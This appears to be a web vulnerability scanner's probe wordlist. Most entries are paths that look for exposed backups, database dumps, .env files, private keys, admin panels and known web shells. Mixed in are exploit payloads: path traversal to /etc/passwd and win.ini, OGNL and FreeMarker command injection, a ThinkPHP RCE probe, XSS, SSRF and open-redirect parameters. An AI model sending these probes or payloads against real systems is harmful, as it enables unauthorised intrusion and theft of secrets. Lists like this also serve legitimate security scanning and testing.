${dirname}.sublime-workspace 
$sitepreview/localhost:2006/Wizard/ 
0 
00 
.%00/WEB-INF/web.xml 
%09Copy%20of%20 
%0a.example.com 
1 
10 
138.key 
192.7z 
192-backup.7z 
192_backup.7z 
192-backup.rar 
192_backup.rar 
192-backup.sql 
192_backup.sql 
192-backup.sql.gz 
192_backup.sql.gz 
192-backup.sql.tar 
192_backup.sql.tar 
192-backup.tar 
192_backup.tar 
192-backup.tar.gz 
192_backup.tar.gz 
192-backup.tgz 
192_backup.tgz 
192-backup.zip 
192_backup.zip 
192-database.7z 
192_database.7z 
192-database.rar 
192_database.rar 
192-database.sql 
192_database.sql 
192-database.sql.gz 
192_database.sql.gz 
192-database.sql.tar 
192_database.sql.tar 
192-database.tar 
192_database.tar 
192-database.tar.gz 
192_database.tar.gz 
192-database.tgz 
192_database.tgz 
192-database.zip 
192_database.zip 
192-db.7z 
192_db.7z 
192db.7z 
192-db.rar 
192_db.rar 
192db.rar 
192-db.sql 
192_db.sql 
192db.sql 
192-db.sql.gz 
192_db.sql.gz 
192db.sql.gz 
192-db.sql.tar 
192_db.sql.tar 
192db.sql.tar 
192-db.tar 
192_db.tar 
192db.tar 
192-db.tar.gz 
192_db.tar.gz 
192db.tar.gz 
192-db.tgz 
192_db.tgz 
192db.tgz 
192-db.zip 
192_db.zip 
192db.zip 
192-dump.7z 
192_dump.7z 
192-dump.rar 
192_dump.rar 
192-dump.sql 
192_dump.sql 
192-dump.sql.gz 
192_dump.sql.gz 
192-dump.sql.tar 
192_dump.sql.tar 
192-dump.tar 
192_dump.tar 
192-dump.tar.gz 
192_dump.tar.gz 
192-dump.tgz 
192_dump.tgz 
192-dump.zip 
192_dump.zip 
192.rar 
192.sql 
192.sql.gz 
192.sql.tar 
192.tar 
192.tar.gz 
192.tgz 
192.zip 
1o4liKNvU7.cfm 
2 
2011 
2012 
2013 
2014 
%20-%20Copy 
206.138.key 
%20(copy) 
%23 
%24 
%24%7B%28%40%63%6F%6D%2E%6F%70%65%6E%73%79%6D%70%68%6F%6E%79%2E%77%65%62%77%6F%72%6B%2E%53%65%72%76%6C%65%74%41%63%74%69%6F%6E%43%6F%6E%74%65%78%74%40%67%65%74%52%65%73%70%6F%6E%73%65%28%29%2E%73%65%74%48%65%61%64%65%72%28%22%58%2D%43%6F%6E%66%6C%75%65%6E%63%65%2D%56%75%6C%6E%22%2C%22%72%77%78%77%76%75%6D%6D%6B%6D%50%50%50%50%50%61%63%6D%61%6A%62%73%64%66%6C%22%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%50%22%2C%22%51%22%29%29%29%7D/ 
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fshells%23foo/development 
%2B 
%2e%2e/debug.js 
%2e%2e/index.js 
%2e%2e/release.js 
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shells 
3 
3068761096 
%3F 
4 
%40 
4787398264 
4images 
5 
5424414324 
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini 
%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/hosts 
6 
7 
%7Eadmin 
%7Eftp 
%7Eguest 
%7Elog 
%7Elogs 
%7Enobody 
%7Eroot 
%7Ewww 
8 
9 
?920202%40 
;948954%40 
9620310 
a 
access 
access-log 
access.log 
access_log 
accesslog 
account 
account.asp 
account.aspx 
account.jsp 
account.php 
account/register 
Account/Register.aspx?ReturnUrl= 
accounts 
actuator/ 
ad 
addons 
.adm 
_adm 
.admin 
_admin 
admin 
admin/
admin/ 
admin_ 
Admin 
ADMIN 
admin0 
admin1 
admin/backup.7z 
admin/backup.rar 
admin/backup.sql 
admin/backup.sql.gz 
admin/backup.sql.tar 
admin/backup.tar 
admin/backup.tar.gz 
admin/backup.tgz 
admin/backup.zip 
admin.cgi 
admin-console 
adminconsole 
admin/create.7z 
admin/create.rar 
admin/create.sql 
admin/create.sql.gz 
admin/create.sql.tar 
admin/create.tar 
admin/create.tar.gz 
admin/create.tgz 
admin/create.zip 
admin/database.7z 
admin/database.rar 
admin/database.sql 
admin/database.sql.gz 
admin/database.sql.tar 
admin/database.tar 
admin/database.tar.gz 
admin/database.tgz 
admin/database.zip 
admin/db.7z 
admin/dbdump.7z 
admin/dbdump.rar 
admin/dbdump.sql 
admin/dbdump.sql.gz 
admin/dbdump.sql.tar 
admin/dbdump.tar 
admin/dbdump.tar.gz 
admin/dbdump.tgz 
admin/dbdump.zip 
admin/db.rar 
admin/db.sql 
admin/db.sql.gz 
admin/db.sql.tar 
admin/db.tar 
admin/db.tar.gz 
admin/db.tgz 
admin/db.zip 
admin/dump.7z 
admin/dump.rar 
admin/dump.sql 
admin/dump.sql.gz 
admin/dump.sql.tar 
admin/dump.tar 
admin/dump.tar.gz 
admin/dump.tgz 
admin/dump.zip 
admin/elmah.axd 
adminer-4.2.5-en.php 
adminer-4.2.5-mysql-en.php 
adminer-4.2.5-mysql.php 
adminer-4.2.5.php 
adminer-4.3.0-en.php 
adminer-4.3.0-mysql-en.php 
adminer-4.3.0-mysql.php 
adminer-4.3.0.php 
adminer-4.3.1-en.php 
adminer-4.3.1-mysql-en.php 
adminer-4.3.1-mysql.php 
adminer-4.3.1.php 
adminer-4.4.0-en.php 
adminer-4.4.0-mysql-en.php 
adminer-4.4.0-mysql.php 
adminer-4.4.0.php 
adminer-4.5.0-en.php 
adminer-4.5.0-mysql-en.php 
adminer-4.5.0-mysql.php 
adminer-4.5.0.php 
adminer-4.6.0-en.php 
adminer-4.6.0-mysql-en.php 
adminer-4.6.0-mysql.php 
adminer-4.6.0.php 
adminer-4.6.1-en.php 
adminer-4.6.1-mysql-en.php 
adminer-4.6.1-mysql.php 
adminer-4.6.1.php 
adminer-4.6.2-en.php 
adminer-4.6.2-mysql-en.php 
adminer-4.6.2-mysql.php 
adminer-4.6.2.php 
_adminer.php 
adminer.php 
Adminer.php 
admin_files 
adminfiles 
admin.htm 
admin.html 
admin/install.php 
administration 
administrative 
administrator 
Administrator 
administrator.cgi 
administrivia 
admin/LiveLogSettingsServlet?Action=read 
admin_login 
admin_logon 
admin/mysql/ 
admin/mysql/main.php 
adminpanel 
admin.php 
admin/phpmyadmin/ 
admin/phpmyadmin/main.php 
admin/pma/ 
admin/pma/main.php 
admins 
adminui 
adminzone 
ad.php 
ads 
AH1rwLOq 
ainstall 
ajax.php 
alegrocart 
amcharts 
amcolumn 
aMember 
analytics/index.php 
anoncvs 
ansible.cfg 
apc.php 
api 
api/ 
api/3/nginx 
api/4/nginx 
api/5/nginx 
api/6/nginx 
api/apidocs/swagger.json 
api/apidocs/swagger.yaml 
api.aspx 
api-docs/swagger.json 
apidocs/swagger.json 
api-docs/swagger.yaml 
apidocs/swagger.yaml 
api/geojson?url=file:///etc/shells 
api.jsp 
api.php 
apisix/admin/services/ 
api/spec/swagger.json 
api/spec/swagger.yaml 
api/swagger.json 
api/swaggerui/swagger.json 
api/swaggerui/swagger.yaml 
api/swagger.yaml 
api/v1 
api/v1.0/swagger.json 
api/v1.0/swagger.yaml 
api/v1/label/__name__/values 
api/v1/swagger.json 
api/v1/swagger.yaml 
api/v2 
api/v2.0/swagger.json 
api/v2.0/swagger.yaml 
api/v2/cmdb/vpn.ssl/settings 
api/v2/swagger.json 
api/v2/swagger.yaml 
api/v3 
api/v4 
api/v5 
app/
app/config/database.yml 
app/config/database.yml~ 
app/config/database.yml_original 
app/config/database.yml.pgsql 
app/config/database.yml.sqlite3 
app/config/parameters.yml 
app/config/parameters.yml.dist 
app/config/security.yml 
app/controllers/application_controller.rb 
app_dev.php/_profiler/open 
appengine 
app.js 
app.json 
apple-app-site-association 
applet.html 
application/configs/application.ini 
application.wadl 
appmetrics-dash 
app.py 
app.rb 
apps 
appsecrets.json 
appsettings.Development.json 
appsettings.json 
appsettings.Production.json 
appsettings.Staging.json 
appspec.yaml 
appspec.yml 
appveyor.yml 
archives 
asf/terminal 
aspnet 
|~.aspx 
aspxspy.aspx 
assets 
assets/%2f 
assets/elfinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
assets/elFinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
atmail 
atom 
attachments 
ATutor 
audio 
auth 
authorized_keys 
auth_user_file.txt 
autocms 
autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@foo.com 
autodiscover/autodiscover.json?@foo.com/owa/?&Email=autodiscover/autodiscover.json%3F@foo.com 
AVideo/install/index.php 
_awstats/ 
awstats/ 
awstats.pl 
axis1/services/listServices 
axis2 
axis2/axis2-admin/ 
axis2/axis2-admin/welcome 
axis2/services/listServices 
axis/services/listServices 
azure-pipelines.yaml 
azure-pipelines.yml 
b 
b2evolution 
bac 
backup 
backup-192.7z 
backup_192.7z 
backup-192.rar 
backup_192.rar 
backup-192.sql 
backup_192.sql 
backup-192.sql.gz 
backup_192.sql.gz 
backup-192.sql.tar 
backup_192.sql.tar 
backup-192.tar 
backup_192.tar 
backup-192.tar.gz 
backup_192.tar.gz 
backup-192.tgz 
backup_192.tgz 
backup-192.zip 
backup_192.zip 
backup.7z 
backup.rar 
backups 
backup.sql 
backup.sql.gz 
backup.sql.tar 
backup.tar 
backup.tar.gz 
backup.tgz 
backup.zip 
bak 
bal 
balancer-manager 
banner 
banners 
base 
.bash_history 
.bash_profile 
basic_status 
bbpress 
Bcnys6QVVn.php 
beheer/ 
beta 
bicomposer/afr/ufocx/remote/H4sIAAAAAAAACnWMsUoDQRCGJ16OXCSFWlikFGx3Y%2BIpaKEgBA_ORrF3k9vLrqw36%2B5Ez8bH8Cl8CfEJbK1tfQNB98K1_jDDNzD_9_oNsXeweSseBFuSNuxceHUhbNz7fHvfvvmIYG0K6wZFMRVzQpdBn5STXqEpantyCk0Gj0nYG2E6QTZYySpJ7Poyf9k9PBj%2BfLkIehkkKsjPsJAZdC06yqEvlqTQaXoi2MqbIjeiWvArcrpaHOfQLbWR9_AMUWCFnlpOrEPCOZr2jpwsV1jb3zYEQ6Vpf5JO0r1xOhrNCjku2az2nt1Jgg5v_mMKWiJra4KdBo44_7_F6z_6LUjXMQEAAA%3D%3D/ 
bigdump.php 
billing 
bin 
bitbucket-pipelines.yaml 
bitbucket-pipelines.yml 
bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};top[%27al%27%2B%27ert%27](31337);if(1){// 
bitrix/redirect.php?goto=https://192.168.206.138%252F@bxss.me/ 
bitrix_server_test.php 
bitweaver 
bizqvbygqw?cb227117=1 
blog 
blogs 
blog/wp-admin/setup-config.php 
bmforum 
bonita/API/portal/page/;i18ntranslation 
.bower.json 
bower.json 
browse 
browser/ 
buddypress 
bugs 
bugzilla 
build 
bxss.me 
/bxss.me/%2e%2e 
@bxss.me::80/rpb.png 
bxss.me::80/rpb.png 
/bxss.me/..;/docs 
/bxss.me/..;/images 
@bxss.me/rpb.png 
bxss.me/rpb.png 
.bzr/README 
c 
c99.php 
c99shell.php 
cache 
cache.asp 
cache.aspx 
cache_html 
cache.jsp 
cache.php 
cacti 
cacti/ 
callback 
callback.asp 
callback.aspx 
callback.jsp 
callback.php 
cart 
catalog/install/index.php 
catalog-portal/ui/oauth/verify?error=&deviceUdid=$%7b\x22freemarker.template.utility.Execute\x22%3fnew()(\x22cat+/etc/shells\x22)%7d 
category 
?cb293188=1 
?cb671687=1 
cc 
ccbill 
cerberus 
cerberusweb 
cfdocs 
CFIDE 
CFIDE/administrator/index.cfm 
cgi-bin 
cgi-bin/
cgi-bin/ 
cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells 
cgi-bin/admin.cgi 
cgi-bin/awstats/ 
cgi-bin/FormHandler.cgi 
cgi-bin/FormMail.cgi 
cgi-bin/guestbook.cgi 
cgi-bin/jarrewrite.sh 
cgi-bin/printenv.pl 
cgi-bin/redirect.cgi?http://bxss.me 
cgi-bin-sdb/printenv 
cgi-bin/search.cgi 
cgi-bin/status.pl 
cgi-bin/test.cgi 
cgi-bin/welcome 
cgi-bin/welcome.cgi 
CGI/Java/Serviceability 
cgi-mod/index.cgi 
cgi-sys 
cgi-sys/addalink.cgi 
cgi-sys/defaultwebpage.cgi 
cgi-sys/domainredirect.cgi 
cgi-sys/entropybanner.cgi 
cgi-sys/entropysearch.cgi 
cgi-sys/FormMail-clone.cgi 
CHANGELOG 
changelog.txt 
Changelog.txt 
ChangeLog.txt 
CHANGELOG.txt 
CHANGELOG.TXT 
CHANGES.html 
changes.txt 
chat 
c-h.v2.php 
.circleci/config.yml 
citydesk.xml 
ckeditor 
class 
classes 
cleanup.log 
client 
clients 
client_secrets.json 
clients.mdb 
clients.sqlite 
cloud-config.yml 
clusters 
cmd 
cmdasp.asp 
cms 
CMS 
cmsmadesimple 
cognos_express/manager/html/ 
common 
common.inc 
compass.rb 
compat 
composer.json 
composer.lock 
concat?/%2557EB-INF/web.xml 
conf 
config 
config/ 
Config 
config/database.yml 
config/database.yml~ 
config/database.yml_original 
config/database.yml.pgsql 
config/database.yml.sqlite3 
config.inc 
config/initializers/secret_token.rb 
config.json 
.config/karma.conf.js 
config.php 
config-prod.json 
config.py 
config.rb 
config.ru 
?[[../../../../config:secret]] 
config/secrets.yml 
config/security.yml 
configuration.php 
configuration.php-dist 
config.xml 
connect.inc 
console 
console/ 
console/images/%252e%252e%252f/console.portal?_nfpb=true&_pageLabel=&handle=1 
containers/ 
contao-manager.phar.php 
content 
contents 
?continue=http://192.168.206.138&window=http://192.168.206.138&out=http://192.168.206.138&navigation=http://192.168.206.138&domain=http://192.168.206.138&return=http://192.168.206.138&redirection_url=http://192.168.206.138&redirect_uri=http://192.168.206.138&host=http://192.168.206.138&domain_name=http://192.168.206.138 
controller 
controllers/application_controller.rb 
coppermine 
Copy%20of%20WEB-INF/jboss-web.xml 
Copy%20of%20WEB-INF/web.xml 
core 
coredumpcheck.php 
core/install.php 
cp 
cpanel 
cp.asp 
cp.aspx 
cpg 
cp.jsp 
cp.php 
CPz958NvLm 
CPz958NvLm.asp 
CPz958NvLm.aspx 
CPz958NvLm.cfm 
CPz958NvLm.cgi 
CPz958NvLm.exe 
CPz958NvLm.jhtml 
CPz958NvLm.jsp 
CPz958NvLm.jspa 
CPz958NvLm.nsf 
CPz958NvLm.php 
CPz958NvLm.phtml 
CPz958NvLm.pl 
CPz958NvLm.plx 
CPz958NvLm.shtml 
CPz958NvLm.stm 
create.7z 
create.rar 
create.sql 
create.sql.gz 
create.sql.tar 
create.tar 
create.tar.gz 
create.tgz 
create.zip 
credentials.json 
credentials.xml 
crm 
cs-cart 
+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 
+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 
+CSCOU+/../+CSCOE+/files/file_list.json 
css/ 
csv 
CSV 
cs-whois 
cubecart 
customer 
customers 
customers.asp 
customers.aspx 
customers.csv 
customers.jsp 
customers.log 
customers.mdb 
customers.php 
customers.sql 
customers.sql.gz 
customers.sqlite 
customers.txt 
customers.xls 
cutenews 
cvs 
CVS 
CVS/Root 
czamipdqry?cb699079=1 
d 
d5kYBaRlKt.aspx 
dana-na///css/ds.js?/dana/html5acc/guacamole/ 
dashboard/ 
dashboard.html 
dat 
data 
database 
database.7z 
database.asp 
database.aspx 
database_credentials.inc 
database.csv 
database.inc 
database.jsp 
database.log 
database.mdb 
database.php 
database.rar 
database.sql 
database.sql.gz 
database.sqlite 
database.sql.tar 
databases.yml 
database.tar 
database.tar.gz 
database.tgz 
database.yml 
database.yml~ 
database.yml_original 
database.yml.pgsql 
database.yml.sqlite3 
database.zip 
data.mdb 
data.sqlite 
dav 
db 
db/ 
DB 
db1.mdb 
db1.sqlite 
db2 
db.7z 
dbaccess.log 
dbadmin/ 
dbadmin/main.php 
dbase 
db.csv 
dbdump.7z 
dbdump.rar 
dbdump.sql 
dbdump.sql.gz 
dbdump.sql.tar 
dbdump.tar 
dbdump.tar.gz 
dbdump.tgz 
dbdump.zip 
db.inc 
db.log 
db/main.php 
db.mdb 
db.rar 
db.sql 
db.sql.gz 
db.sqlite 
db.sql.tar 
db.tar 
db.tar.gz 
db.tgz 
db.zip 
dchat 
de 
DEADJOE 
dead.letter 
?__debugger__=yes&cmd=resource&f=debugger.js 
debug.inc 
debug.log 
debug.php 
debug/pprof/ 
__debug__/render_panel/?store_id=1 
_debug_toolbar/ 
debug.txt 
debug/vars 
default 
Default 
default.json 
deluxebb 
demo 
.deployignore 
dev 
devel 
developer 
developers 
devels 
django 
dl 
doc 
docker-cloud.yml 
docker-compose-dev.yml 
docker-compose.yaml 
docker-compose.yml 
Dockerfile 
.dockerignore 
Dockerrun.aws.json 
docs 
docs/
documents 
dokuwiki 
dokuwiki/install.php 
dolphin 
dotproject 
down 
download 
Download 
download.asp 
download.aspx 
download.jsp 
download.php 
downloads 
Downloads 
dra.php 
druid/weburi.html 
drupal 
drupal/install.php?profile=default 
.DS_Store 
dswsbobje/services/listServices 
dump 
dump.7z 
Dump.aspx 
dump.rar 
dump.sql 
dump.sql.gz 
dump.sql.tar 
dump.tar 
dump.tar.gz 
dump.tgz 
dump.zip 
e 
e107 
eam/vibd?id=C:\x5CWindows\x5Cwin.ini 
eam/vib?id=C:\x5CWindows\x5Cwin.ini 
edit 
editor 
editor/stats/ 
elfinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
elFinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
elmah.axd 
em/afr/yszif/remote/H4sIAAAAAAAACnWMsUrEQBCG58yFy8kVamFxpWC7ixhyRAsF4TAQG8XeTbJ3u7Jm1905XRsfw6fwJcQnsLW29Q0E3Rxp_WGGb2D%2B7_UbYmdh%2B5Y9MLJCqcg5c%2BKCmXj0%2Bfa%2Be_MRwcYcNpVmzZzVqG0BYxSWO6FV483JKXSZPCZhb4UZBNlkLWs5kuvL8mV_lk1_vmwEowISEeRnuuEFDI22WMKYrVBoK_EJYafsilSxdkmv0Mp2eVzCcCEVv4dniAIL7bDnxFiNutaqvyPLF2v05rcPwlRIzA7zNM3zgyydVVVdk8o7R%2B44woB2_zEGLaIxHmGvgyNK_29R_wdFTfC_MQEAAA%3D%3D/ 
email 
en 
en/account/register 
english 
en-us/account/register 
._env 
.env 
.env_1 
.env.backup 
.env.dev 
.env.development.local 
.env.dev.local 
environment.rb 
env.json 
.env.live 
.env.local 
.env.old 
.env_old 
.env.prod 
.env.prod.local 
.env.production 
.env.production.local 
.env.save 
.env.stage 
.env.test 
.env.test.local 
erigyvidqn?cb138026=1 
err 
error 
Error 
error-log 
error.log 
error_log 
errorlog 
_errors 
errors 
errors.log 
Estadisticas/ 
etc 
etc/shells 
eticket 
eureka/ 
evdjbnksne?cb116269=1 
ewS8Zx8hYY6hzvrb 
example 
examples 
examples/jsp/%252e%252e/%252e%252e/manager/html/ 
examples/jsp/index.html 
examples/jsp/snp/snoop.jsp 
examples/servlets/index.html 
examples/servlet/SnoopServlet 
examples/servlets/servlet/SessionExample 
exchange 
Exchange 
export 
export.asp 
export.aspx 
export.jsp 
export.php 
extrahop/ 
ezPublish 
eZServerMonitor/ 
f 
fck 
fckeditor 
FCKeditor 
feed 
file 
fileadmin 
file_manager 
filemanager 
file_manager.asp 
file_manager.aspx 
file_manager.jsp 
file_manager.php 
_files 
files 
files.asp 
files.aspx 
fileserver 
files.jsp 
files.php 
file_upload 
fileupload 
file_upload.asp 
fileupload.asp 
file_upload.aspx 
fileupload.aspx 
file_upload.jsp 
fileupload.jsp 
file_upload.php 
fileupload.php 
firephp 
flash 
Flex 
fluxbb 
flyspray 
folder 
fonts 
footer 
footer.asp 
footer.aspx 
footer.jsp 
footer.php 
forgot 
forgot.asp 
forgot.aspx 
forgot.jsp 
forgot.php 
forms 
forum 
fpadmin 
fr 
_fragment 
frontend 
frontend_dev.php/5120865323 
frontend_dev.php/8391658614 
frrfsrrtxj?cb079220=1 
ftp 
functions 
functions.asp 
functions.aspx 
functions.jsp 
functions.php 
FusionBB 
g 
gallery 
geeklog 
Gemfile 
Gemfile.lock 
genericons 
?gGBw={vsCx}&firc=<> 
.git/config 
.github/workflows/build.yml 
.github/workflows/check.yml 
.github/workflows/ci.yaml 
.github/workflows/ci.yml 
.github/workflows/lint.yml 
.github/workflows/main.yml 
.github/workflows/publish.yml 
.github/workflows/push.yml 
.github/workflows/release.yml 
.github/workflows/stale.yml 
.github/workflows/tests.yml 
.github/workflows/test.yml 
.gitignore 
.gitlab-ci.yml 
global 
global.asa.bak 
Global.asa.bak 
global.asa.old 
global.asa.orig 
global.asa.temp 
global.asa.tmp 
global.asax.bak 
Global.asax.bak 
global.asax.old 
global.asax.orig 
global.asax.temp 
global.asax.tmp 
globals 
go/add-on/business-continuity/api/cruise_config 
graphics 
graphs/ 
group 
Gruntfile.coffee 
GruntFile.coffee 
gruntFile.js 
Gruntfile.js 
Guardfile 
Gulpfile.coffee 
gulpfile.js 
Gulpfile.js 
h 
h2/ 
h2-console/ 
haproxy?stats 
ha-stats 
header 
header.asp 
header.aspx 
header.jsp 
header.php 
health 
health/check 
health/panel 
help 
helpdesk/setup/index.php 
.hg/hgrc 
.hgignore 
.hg/requires 
.histfile 
.history 
home 
home.asp 
home.aspx 
home.jsp 
home.php 
horde 
horde/imp/test.php 
horde/util/barcode.php?type=../../../../../../../../../../../etc/passwd%00 
horizon/dashboard 
host-manager/html/ 
host-manager/text/ 
hsqldb; 
.htaccess 
.htaccess~ 
htaccess.bak 
.htaccess.old 
.htaccess.save 
htaccess.txt 
htdocs 
html 
.htpasswd 
http://bxss.me/t/fit.txt 
i 
ibill 
icon 
icons 
icons/
icons/ 
id_dsa 
id_dsa.ppk 
.idea/workspace.xml 
?id=JJJ0QQQ&action=JJJ1QQQ&page=JJJ2QQQ&name=JJJ3QQQ&f=JJJ4QQQ&url=JJJ5QQQ&email=JJJ6QQQ&type=JJJ7QQQ&file=JJJ8QQQ&title=JJJ9QQQ&code=JJJ10QQQ&q=JJJ11QQQ&user=JJJ12QQQ&token=JJJ13QQQ&t=JJJ14QQQ&c=JJJ15QQQ&data=JJJ16QQQ&mode=JJJ17QQQ&order=JJJ18QQQ&lang=JJJ19QQQ&p=JJJ20QQQ&key=JJJ21QQQ&status=JJJ22QQQ&start=JJJ23QQQ&charset=JJJ24QQQ&s=JJJ25QQQ&post=JJJ26QQQ&login=JJJ27QQQ&search=JJJ28QQQ&content=JJJ29QQQ&comment=JJJ30QQQ&step=JJJ31QQQ&ajax=JJJ32QQQ&debug=JJJ33QQQ&state=JJJ34QQQ&query=JJJ35QQQ&error=JJJ36QQQ&save=JJJ37QQQ&sort=JJJ38QQQ&format=JJJ39QQQ&tab=JJJ40QQQ&offset=JJJ41QQQ&edit=JJJ42QQQ&preview=JJJ43QQQ&filter=JJJ44QQQ&from=JJJ45QQQ&view=JJJ46QQQ&a=JJJ47QQQ&limit=JJJ48QQQ&do=JJJ49QQQ&plugin=JJJ50QQQ&theme=JJJ51QQQ&text=JJJ52QQQ&test=JJJ53QQQ&path=JJJ54QQQ&pass=JJJ55QQQ&dir=JJJ56QQQ&show=JJJ57QQQ&h=JJJ58QQQ&value=JJJ59QQQ&filename=JJJ60QQQ&redirect=JJJ61QQQ&year=JJJ62QQQ&group=JJJ63QQQ&template=JJJ64QQQ&subject=JJJ65QQQ&m=JJJ66QQQ&u=JJJ67QQQ&dest=JJJ68QQQ&uri=JJJ69QQQ&continue=JJJ70QQQ&window=JJJ71QQQ&next=JJJ72QQQ&reference=JJJ73QQQ&site=JJJ74QQQ&&yVkMB=JJJ75QQQ& 
?id.__proto__.expect=100-continue&id.constructor.prototype.expect=100-continue&id[__proto__][expect]=100-continue&__proto__.expect=100-continue&constructor.prototype.expect=100-continue& 
id_rsa 
_ignition/health-check 
iisadmin 
iishelp 
image 
images 
images/
images/ 
Images 
ImageVue 
img 
import 
import.sql 
inc 
_include 
include 
includes 
incomming 
index 
Index 
index.asp 
index.aspx 
index_files 
index.html 
index.jsp 
index.php 
index.php?action=register 
index.php?app=core&module=global&section=register 
index.php?_a=register 
index.php/component/users/?view=registration 
index.php/customer/account/create/ 
index.php/install 
index.php/register/ 
index.php?r=installer/welcome 
index.php?route=account/register 
index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=31337 
index.php?title=Special:UserLogin&returnto=Main+Page&type=signup 
inexistent_file_name.inexistent0123450987.cfm 
info 
info.asp 
info.aspx 
info.jsp 
info.php 
info.txt 
infO.txt 
ini 
!install 
_install 
install 
install_ 
Install 
INSTALL_admin 
install.asp 
install.aspx 
installation/index.php 
installer 
installer/index.php 
INSTALL.html 
install/index.php 
install/index.php?route=install/step_2 
install.jsp 
install/page_langselect.php 
install.php 
install.php?profile=default 
Install.txt 
INSTALL.txt 
internal 
interspire 
intranet 
invoker 
invoker/EJBInvokerServlet 
invoker/JMXInvokerServlet 
ioncube/loader-wizard.php?page=phpinfo 
ipb 
i.php 
iProber2.php 
iProber3.php 
.irb_history 
.irbrc 
j 
j2ee/servlet/SnoopServlet 
j2/installation/index.php 
jboss-net/services/listServices 
jbossws/services 
jdbc 
jenkins 
jkstatus;a 
jmx-console 
jmx-console/ 
jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployer:service%3DBSHDeployer 
jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type%3DServer 
jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type%3DServerInfo 
job-overview 
join 
join.asp 
join.aspx 
join.jsp 
join.php 
joomla 
jrun 
js 
js/
json 
jsp/help-sb-download.jsp?sbFileName=../../../../../etc/shells 
jsp/viewer/snoop.jsp 
juddi 
k 
k8rjCeAIAU.cfm 
karma.conf.js 
kayako 
keycloak.json 
key.pem 
KOyNKUSluL.asp 
kustomization.yaml 
l 
languages 
latest 
_layouts 
_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D&sections=All<script>alert(12345)</script>z 
lc/system/console 
LetsEncrypt/Index?fileName=c:\x5Cwindows\x5Cwin.ini 
LetsEncrypt/Index?fileName=/etc/shells 
lib 
libs 
license.txt 
lifetype 
limesurvey/index.php?r=installer/welcome 
list 
listener.log 
.listing 
livechat 
livezilla 
loader-wizard.php?page=phpinfo 
localhost.sql 
log 
log.asp 
log.aspx 
logfile 
logfiles 
log.htm 
log.html 
login 
login.asp 
login.aspx 
login.html 
login.jsp 
login.php 
log.jsp 
log.mdb 
log.php 
_logs 
logs 
logs/ 
logs?dl=bGFyYXZlbC5sb2c= 
logs.htm 
logs.html 
logs.mdb 
log.sqlite 
logs.sqlite 
log.txt 
log-viewer/ 
log/view?filename=shells&base=..%2Fetc 
lol.php 
long_inexistent_path12345_/Null.htw?CiWebhitsfile=:&CiRestriction=b&CiHiliteType=full 
lostpassword 
lua/login.lua 
m 
__MACOSX 
magento 
mail 
mailman 
main 
mambo 
manage_main 
management 
management/info 
manage.py 
manager 
manager.asp 
manager.aspx 
manager/html/ 
manager.jsp 
manager.php 
manager/status/ 
manager/status/all 
mantis 
manual 
manuals 
master-status 
matomo/index.php 
media 
mediawiki 
member 
memberlist 
member.php?action=register 
members 
members.asp 
members.aspx 
members.csv 
members.jsp 
members.log 
members.mdb 
membersonly 
members.php 
members.sql 
members.sql.gz 
members.sqlite 
members.txt 
members.xls 
menu 
messages 
metrics 
mime 
minibb 
mint 
Mint 
misc 
misc.asp 
misc.aspx 
misc.jsp 
misc.php 
/_mmServerScripts/MM
_mmServerScripts/MM
mod_pagespeed_statistics 
modules 
modules.asp 
modules.aspx 
modules.jsp 
modules.php 
modx 
moinmoin 
monitor/ 
monitorix/ 
monitorix-cgi/monitorix.cgi 
moodle 
mp3 
mrtg 
msql 
mssql 
mt 
mt-check.cgi 
multihost 
munin 
munin/ 
music 
myadmin/ 
myadmin/main.php 
mybb 
myserver.key 
mysql 
mysql/ 
mysqladmin/ 
mysqladmin/main.php 
mysql.asp 
mysql.aspx 
.mysql_history 
mysql.jsp 
mysql/main.php 
mysql.php 
n 
na_admin 
nacos/v1/auth/users/?pageNo=1&pageSize=10 
nagios 
nagios/ 
nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=http://example.com/ 
.nano_history 
nbproject 
nette.micro?callback=phpinfo&cmd=1 
New%20Folder 
New%20folder%20(2) 
nginx_status 
noah 
node_modules/body-parser/package.json 
nodemon.json 
nohup.out 
now.json 
npm-debug.log 
nst.php 
nstview.php 
nusoap 
_nuster 
nuster 
NYtrKGesq7.html 
o 
OA_HTML/AppsLocalLogin.jsp 
oauth 
oauth/authorize?response_type=token&client_id=acme&redirect_uri=${333333*3} 
_odata 
odata 
OData/ 
OData/OData.svc/ 
odbc 
_old 
old 
old_files 
oldfiles 
omifulqamd?cb288468=1 
opcache-gui/index.php 
opcache/index.php 
opcache.php 
opcache-status/ 
opcache-status/opcache.php 
opencart 
opencart/install/index.php?route=install/step_2 
opennms/login.jsp 
opensearch 
opensearch.xml 
openx 
oracle 
orders 
orders.asp 
orders.aspx 
orders.csv 
orders.jsp 
orders.log 
orders.php 
orders.sql 
orders.sql.gz 
orders.txt 
orders.xls 
oscommerce 
osTicket 
osticket/setup/index.php 
otdikuhifo?cb802969=1 
otqfdauexz?cb467745=1 
otrs/ 
